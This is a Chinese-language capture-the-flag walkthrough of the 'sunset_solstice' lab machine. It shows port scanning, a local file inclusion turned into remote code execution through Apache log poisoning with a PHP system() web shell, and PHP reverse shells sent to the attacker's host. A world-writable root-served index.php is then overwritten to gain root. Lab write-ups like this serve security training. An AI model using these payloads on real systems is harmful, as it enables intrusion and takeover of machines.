sunset_solstice 靶机

信息收集

┌──(kali㉿kali)-[~/Documents/sunset_solstice]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.151 --proxies http://192.168.56.151:3128 
Not shown: 65525 closed tcp ports (reset)
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
25/tcp    open  smtp
80/tcp    open  http
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
2121/tcp  open  ccproxy-ftp
3128/tcp  open  squid-http
8593/tcp  open  unknown
54787/tcp open  unknown
MAC Address: 08:00:27:40:D0:9B (Oracle VirtualBox virtual NIC)

开放端口蛮多的，继续 nmap

┌──(kali㉿kali)-[~/Documents/sunset_solstice]
└─$ sudo nmap -sT -sV -sC -O -p21,22,25,80,139,445,2121,3128,8593,54787,62524 192.168.56.151
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-09 21:41 EDT
Nmap scan report for 192.168.56.151
Host is up (0.00045s latency).

PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         pyftpdlib 1.5.6
| ftp-syst: 
|   STAT: 
| FTP server status:
|  Connected to: 192.168.56.151:21
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.
22/tcp    open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 5b:a7:37:fd:55:6c:f8:ea:03:f5:10:bc:94:32:07:18 (RSA)
|   256 ab:da:6a:6f:97:3f:b2:70:3e:6c:2b:4b:0c:b7:f6:4c (ECDSA)
|_  256 ae:29:d4:e3:46:a1:b1:52:27:83:8f:8f:b0:c4:36:d1 (ED25519)
25/tcp    open  smtp        Exim smtpd 4.92
| smtp-commands: solstice Hello nmap.scanme.org [192.168.56.106], SIZE 52428800, 8BITMIME, PIPELINING, CHUNKING, PRDR, HELP
|_ Commands supported: AUTH HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
80/tcp    open  http        Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn\'t have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open              Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
2121/tcp  open  ftp         pyftpdlib 1.5.6
| ftp-syst: 
|   STAT: 
| FTP server status:
|  Connected to: 192.168.56.151:2121
|  Waiting for username.
|  TYPE: ASCII; STRUcture: File; MODE: Stream
|  Data connection closed.
|_End of status.
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drws------   2 www-data www-data     4096 Jun 18  2020 pub
3128/tcp  open  http-proxy  Squid http proxy 4.6
|_http-server-header: squid/4.6
|_http-title: ERROR: The requested URL could not be retrieved
8593/tcp  open  http        PHP cli server 5.5 or later (PHP 7.3.14-1)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Site doesn\'t have a title (text/html; charset=UTF-8).
54787/tcp open  http        PHP cli server 5.5 or later (PHP 7.3.14-1)
|_http-title: Site doesn\'t have a title (text/html; charset=UTF-8).
62524/tcp open  tcpwrapped
MAC Address: 08:00:27:40:D0:9B (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: Host: solstice; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: \x00
|   NetBIOS computer name: SOLSTICE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2023-10-09T21:41:29-04:00
| smb2-time: 
|   date: 2023-10-10T01:41:30
|_  start_date: N/A
|_clock-skew: mean: 1h19m58s, deviation: 2h18m33s, median: -1s
|_nbstat: NetBIOS name: SOLSTICE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

2121 端口可匿名登录，3128 端口是代理转发端口，8593 上跑了个 PHP 的 Web 服务，同时还有 139 和 445 的 smb 服务。有一些产品和版本号也要记得搜一下是否有漏洞，比如这里的 Exim smtpd 4.92 和 pyftpdlib 1.5.6。 nmap 自带的漏洞脚本跑一下。

┌──(kali㉿kali)-[~/Documents/sunset_solstice]
└─$ sudo nmap --script=vuln -p21,22,25,80,139,445,2121,3128,8593,54787,62524 192.168.56.151 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-09 21:48 EDT

PORT      STATE  SERVICE
21/tcp    open   ftp
22/tcp    open   ssh
25/tcp    open   smtp
| smtp-vuln-cve2010-4344: 
|   Exim version: 4.92
|   Exim heap overflow vulnerability (CVE-2010-4344):
|     Exim (CVE-2010-4344): NOT VULNERABLE
|   Exim privileges escalation vulnerability (CVE-2010-4345):
|     Exim (CVE-2010-4345): NOT VULNERABLE
|_  To confirm and exploit the vulnerabilities, run with --script-args='smtp-vuln-cve2010-4344.exploit'
80/tcp    open   http
|_http-dombased-xss: Couldn\'t find any DOM based XSS.
|_http-csrf: Couldn\'t find any CSRF vulnerabilities.
|_http-stored-xss: Couldn\'t find any stored XSS vulnerabilities.
139/tcp   open   netbios-ssn
445/tcp   open   microsoft-ds
2121/tcp  open   ccproxy-ftp
3128/tcp  open   squid-http
8593/tcp  open   unknown
54787/tcp open   unknown
62524/tcp closed unknown
MAC Address: 08:00:27:40:D0:9B (Oracle VirtualBox virtual NIC)

Host script results:
| smb-vuln-regsvc-dos: 
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_          
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false

没收获，试一试指定 smb 脚本

┌──(kali㉿kali)-[~/Documents/sunset_solstice]
└─$ sudo nmap --script=smb-enum-shares.nse,smb-enum-users.nse 192.168.56.151
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-10 23:12 EDT
Nmap scan report for 192.168.56.151
Host is up (0.00013s latency).
Not shown: 992 closed tcp ports (reset)
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
2121/tcp open  ccproxy-ftp
3128/tcp open  squid-http
MAC Address: 08:00:27:40:D0:9B (Oracle VirtualBox virtual NIC)

Host script results:
| smb-enum-shares: 
|   account_used: guest
|   \\192.168.56.151\IPC$: 
|     Type: STYPE_IPC_HIDDEN
|     Comment: IPC Service (Samba 4.9.5-Debian)
|     Users: 2
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\192.168.56.151\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|_    Current user access: <none>

对 smb 的扫描没发现什么有价值的用户和路径

FTP 匿名登录

看看 ftp 匿名登录吧

┌──(kali㉿kali)-[~/Documents/sunset_solstice]
└─$ ftp 192.168.56.151 2121
Connected to 192.168.56.151.
220 pyftpdlib 1.5.6 ready.
Name (192.168.56.151:kali): anonymous
331 Username ok, send password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> binary
200 Type set to: Binary.
ftp> ls
229 Entering extended passive mode (|||55617|).
125 Data connection already open. Transfer starting.
drws------   2 www-data www-data     4096 Jun 18  2020 pub
226 Transfer complete.
ftp> cd pub
250 "/pub" is the current directory.
ftp> ls
229 Entering extended passive mode (|||36105|).
125 Data connection already open. Transfer starting.
226 Transfer complete.
ftp> pwd
Remote directory: /pub

21 端口匿名登录需要密码，2121 端口匿名登录后只有一个文件夹，没有文件，尝试上传文件，提示没有权限。查看 Web 服务

Web 渗透

80 端口：

有产品的名字和版本号，尝试搜索漏洞库

有 SQL 注入的 exp，但是尝试之后发现，存在 SQL 注入的 URL 是登录界面，而直接访问此 URL 得到的是 403 的回复。

尝试添加 3128 端口作为代理，访问 80 端口和存在注入的 URL，没什么额外的收获，还是无法访问目标 URL

目录爆破

尝试目录爆破

┌──(kali㉿kali)-[~/Documents/sunset_solstice]
└─$ sudo gobuster dir -u http://192.168.56.151/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt 

===============================================================
[+] Url:                     http://192.168.56.151/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
/app                  (Status: 301) [Size: 314] [--> http://192.168.56.151/app/]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.56.151/javascript/]
/backup               (Status: 301) [Size: 317] [--> http://192.168.56.151/backup/]
/server-status        (Status: 403) [Size: 279]

访问这几个路径都是 403，又尝试了 dirsearch 的结果也没收获

8593 端口也尝试了目录爆破，没结果

本地文件包含漏洞

这里的 URL 看起来有点奇怪，尝试一下是否有可能是命令执行或者文件包含的漏洞

存在文件包含漏洞，又顺手试了一下存不存在远程文件包含，结果是只存在本地文件包含

接下来我尝试了访问一些可能的敏感文件，主要参考 AutoWordlists ，尝试了 ssh 私钥，bash 历史文件，shadow 文件，和可能存在的 phpIPAM 配置文件 /var/www/html/phpIPAM/config.php （看网上的安装教程猜测的路径），几个 apache 日志路径，都没收获

passwd 文件中收集到的用户名，我也尝试了 ftp 爆破和 ssh 爆破，但由于时间太长，各跑了十分钟就停了

通过日志文件反弹shell

不过均无收获，看了眼 WP，发现是 apache 日志可访问，再次跑到 AutoWordlists 中搜索 apache，依次访问

在 http://192.168.56.151:8593/index.php?book=../../../../var/log/apache2/access.log 中访问得到了日志文件

备注：这里由于我之前目录爆破得缘故，日志文件很大，因此我选择了恢复虚拟机的快照

使用 burp suite 来修改 User-Agent

GET / HTTP/1.1

Host: 192.168.56.151

User-Agent: Mozilla/5.0 <?php system($_GET['cmd']); ?> Gecko/20100101 Firefox/102.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Cookie: PHPSESSID=dis82fr2akr5lpn6666uuug2ou

Upgrade-Insecure-Requests: 1

If-Modified-Since: Thu, 25 Jun 2020 14:45:19 GMT

If-None-Match: "128-5a8e9a431c517-gzip"

访问日志发现，php 代码并没有显示出来，那么证明了文件包含后代码被运行了。然后构造 payload

http://192.168.56.151:8593/index.php?book=../../../../var/log/apache2/access.log&cmd=id

注意，这里可能下意识直接使用 ?cmd=id，进而导致传入参数失败，一定要看清 URL 的结构，否则构造错误的 payload1 会极大浪费时间来排查

接下来考虑反弹 shell

GET /index.php?book=../../../../var/log/apache2/access.log&cmd=php+-r+'$sock%3dfsockopen("192.168.56.106",443)%3bexec("sh+<%263+>%263+2>%263")%3b' HTTP/1.1

这里我先尝试了 Online - Reverse Shell Generator (revshells.com) 中的几个 PHP 代码，有几个反弹成功后立马就断开了，尝试了几个不同的代码最后得到了稳定的 shell

┌──(kali㉿kali)-[~/Documents/sunset_solstice]
└─$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.151] 52314
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
ip a   
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:40:d0:9b brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.151/24 brd 192.168.56.255 scope global dynamic enp0s3
       valid_lft 596sec preferred_lft 596sec
    inet6 fe80::a00:27ff:fe40:d09b/64 scope link 
       valid_lft forever preferred_lft forever
uname -a
Linux solstice 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux
python -c "import pty;pty.spawn('/bin/bash')"
www-data@solstice:/home/miguel$ sudo -l
sudo -l
[sudo] password for www-data:

提权之信息收集

查看 SUID 文件、定时任务文件、网站目录下文件、用户家目录文件，没什么收获，而且 user.txt 是 www-data 用户无法直接读取的，直接 linpeas 吧

查看发现了几个感兴趣的点

1. gcc 可用
2. 推荐了 [CVE-2019-13272] PTRACE_TRACEME 内核漏洞
3. 127.0.0.1:57 -t /var/tmp/sv/ 57端口运行了一个服务
4. /var/tmp 下有很多服务程序

网站根目录下的一个配置文件

www-data@solstice:~/html/phpIPAM$ cat config.php
cat config.php
Try harder!

www-data@solstice:/var/tmp$ ls -liha
ls -liha
total 36K
524470 drwxrwxrwt  9 root     root     4.0K Oct 11 03:39 .
524289 drwxr-xr-x 12 root     root     4.0K Jun 13  2020 ..
527622 drwxr-xr-x  2 www-data www-data 4.0K Jun 25  2020 fake_ftp
524448 drws------  3 www-data www-data 4.0K Jun 17  2020 ftp
526416 drwsrwxrwx  2 root     root     4.0K Jun 26  2020 sv
527778 drwx------  3 root     root     4.0K Oct 11 02:56 systemd-private-eb3c320d1bd44bd19d2a522d01716beb-apache2.service-B3KLFo
524319 drwx------  3 root     root     4.0K Oct 11 02:56 systemd-private-eb3c320d1bd44bd19d2a522d01716beb-systemd-timesyncd.service-H8nVn6
524444 drwxr-xr-x  2 www-data www-data 4.0K Jun 26  2020 webserver
524447 drwxr-xr-x  3 www-data www-data 4.0K Jun 19  2020 webserver_2

先看一下 57 端口运行的服务吧，这个没直接暴露在 web 中

www-data@solstice:/var/tmp/sv$ ls -alih
ls -alih
total 12K
526416 drwsrwxrwx 2 root root 4.0K Jun 26  2020 .
524470 drwxrwxrwt 9 root root 4.0K Oct 11 03:39 ..
527621 -rwxrwxrwx 1 root root   36 Jun 19  2020 index.php
www-data@solstice:/var/tmp/sv$ cat index.php
cat index.php
<?php
echo "Under construction";
?>

网站文件权限配置错误提权

index.php 竟然是 root 属主 777 权限的文件，加上又绑定了运行的端口，或许可以利用，写入反弹 shell 的代码到文件中，不过又遇到了之前反弹 shell 的问题，刚连上就断开了，反复换了几个一句话的代码，最终成功。提前开启监听后再使用 curl 命令来反弹shell

www-data@solstice:/var/tmp/sv$ echo '<?php $sock=fsockopen("192.168.56.106",444);$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>' > index.php

www-data@solstice:/var/tmp/sv$ cat index.php
<?php $sock=fsockopen("192.168.56.106",444);$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?>
www-data@solstice:/var/tmp/sv$ curl http://127.0.0.1:57/index.php

反弹 shell 成功

┌──(kali㉿kali)-[~/Documents/sunset_solstice]
└─$ sudo nc -lvnp 444
listening on [any] 444 ...
connect to [192.168.56.106] from (UNKNOWN) [192.168.56.151] 47580
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 08:00:27:40:d0:9b brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.151/24 brd 192.168.56.255 scope global dynamic enp0s3
       valid_lft 413sec preferred_lft 413sec
    inet6 fe80::a00:27ff:fe40:d09b/64 scope link 
       valid_lft forever preferred_lft forever
uname -a
Linux solstice 4.19.0-8-amd64 #1 SMP Debian 4.19.98-1 (2020-01-26) x86_64 GNU/Linux

找找 flag 文件

cd /root
ls -liah
total 60K
131078 drwx------  9 root root 4.0K Jun 26  2020 .
     2 drwxr-xr-x 18 root root 4.0K Apr 21  2020 ..
142795 lrwxrwxrwx  1 root root    9 Jun 26  2020 .bash_history -> /dev/null
131081 -rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
267055 drwx------  3 root root 4.0K Jun 17  2020 .cache
262148 drwxr-xr-x  3 root root 4.0K Jun 13  2020 .config
269685 drwxr-xr-x  2 root root 4.0K Jun 19  2020 ftp
262531 drwx------  3 root root 4.0K Jun 18  2020 .gnupg
142644 drwxr-xr-x  3 root root 4.0K Jun 13  2020 .local
142642 -rw-------  1 root root 2.8K Jun 19  2020 .mysql_history
131080 -rw-r--r--  1 root root  148 Aug 17  2015 .profile
142794 -rw-r--r--  1 root root  113 Jun 26  2020 root.txt
142775 -rw-r--r--  1 root root   66 Jun 13  2020 .selected_editor
269682 drwx------  2 root root 4.0K Jun 19  2020 .ssh
142776 -rw-r--r--  1 root root  173 Jun 25  2020 .wget-hsts
267135 drwxr-xr-x  4 root root 4.0K Jun 18  2020 .wine
python -c "import pty;pty.spawn('/bin/bash')"
root@solstice:~# cat root.txt
cat root.txt

No ascii art for you >:(

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

f950998f0d484a2ef1ea83ed4f42bbca

root@solstice:~# cat /home/miguel/user.txt
cat /home/miguel/user.txt
c0e1f61ff8e753d8b27615bdc4f25794

总结

卡住的点是本地文件包含来反弹 shell，寻找 apache 日志文件目录时没有更多尝试，导致攻击路径没有成功。这台靶机别的方面倒是没特别复杂

链接

蛮好用的一个别人的备忘录：07.端口对应渗透（端口渗透备忘录） · d4m1ts 知识库 (gm7.org)

offsec 有视频讲解： Solstice VM - Walkthrough with S1REN. - YouTube